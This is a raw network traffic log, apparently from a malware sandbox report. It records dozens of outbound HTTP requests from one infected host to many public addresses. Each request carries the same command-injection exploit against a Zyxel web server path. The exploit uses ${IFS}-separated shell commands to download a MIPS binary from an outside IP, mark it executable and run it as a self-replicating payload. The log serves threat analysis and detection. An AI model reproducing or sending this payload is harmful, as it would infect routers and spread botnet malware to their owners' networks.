                                            Jan 14, 2024 15:50:45.540725946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5965192.168.2.2348950130.173.141.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540770054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5966192.168.2.2359192112.147.206.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540796041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5967192.168.2.2354182183.206.141.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540848970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5968192.168.2.234837465.38.105.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540864944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5969192.168.2.2354264147.45.24.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540899992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5970192.168.2.2339792167.121.188.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540951014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5971192.168.2.2354702160.130.237.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.540987968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5972192.168.2.2345882125.162.115.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541023016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5973192.168.2.2354494163.40.138.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541034937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5974192.168.2.2351714221.196.220.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541059971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5975192.168.2.234971668.167.139.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541090012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5976192.168.2.2347946105.23.115.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541129112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5977192.168.2.2335430133.149.17.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541146994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5978192.168.2.233440485.205.209.84443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541193008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5979192.168.2.2341446123.96.100.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541251898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5980192.168.2.2335306162.144.110.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541254044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5981192.168.2.2346124219.141.62.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541274071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5982192.168.2.233890498.171.12.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541321993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5983192.168.2.2346894105.238.253.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541357040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5984192.168.2.2344006137.20.32.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541378021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5985192.168.2.234237264.78.250.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541410923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5986192.168.2.235028823.177.89.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541466951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5987192.168.2.2360978106.130.73.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541481018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5988192.168.2.2355610174.77.104.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541516066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5989192.168.2.2333940103.225.84.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541547060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5990192.168.2.234805273.40.99.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541568995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5991192.168.2.233837693.11.214.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541610003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5992192.168.2.233913096.223.50.41443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541644096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5993192.168.2.234206049.225.157.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541666985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5994192.168.2.23452444.110.145.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541670084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5995192.168.2.2335508191.56.89.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541719913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5996192.168.2.2338028186.189.107.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541735888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5997192.168.2.234984468.167.158.84443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541755915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5998192.168.2.2336418206.55.253.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541825056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5999192.168.2.235437057.111.180.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541855097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6000192.168.2.2337036196.125.20.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541883945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6001192.168.2.2344568220.96.108.136443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541912079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6002192.168.2.2348324207.203.130.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541930914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6003192.168.2.2335782134.136.194.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.541954041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6004192.168.2.233571631.23.38.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542013884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6005192.168.2.2345402112.74.214.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542026997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6006192.168.2.233478288.154.125.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542048931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6007192.168.2.2349956109.140.132.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542067051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6008192.168.2.2339772183.38.118.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542100906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6009192.168.2.2339576188.61.79.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542124033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6010192.168.2.2332924180.160.103.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542174101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6011192.168.2.2340408177.156.167.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542203903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6012192.168.2.235426896.111.51.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542233944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6013192.168.2.2352482222.90.127.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542262077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6014192.168.2.233849044.51.9.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542305946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6015192.168.2.23564962.41.149.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542315960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6016192.168.2.2347960122.53.12.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542370081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6017192.168.2.233727844.36.63.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542396069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6018192.168.2.2339862222.194.59.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542433023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6019192.168.2.2358666129.102.146.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542460918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6020192.168.2.233466697.251.125.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542490005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6021192.168.2.2350350117.29.203.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542490005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6022192.168.2.234625848.23.91.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542531013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6023192.168.2.2350854212.151.38.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542583942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6024192.168.2.2358170132.106.104.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542613029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6025192.168.2.2350826218.153.81.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542634964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6026192.168.2.2333624186.195.128.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:45.542649031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6027192.168.2.2333260108.250.73.31443
                                            TimestampBytes transferredDirectionData
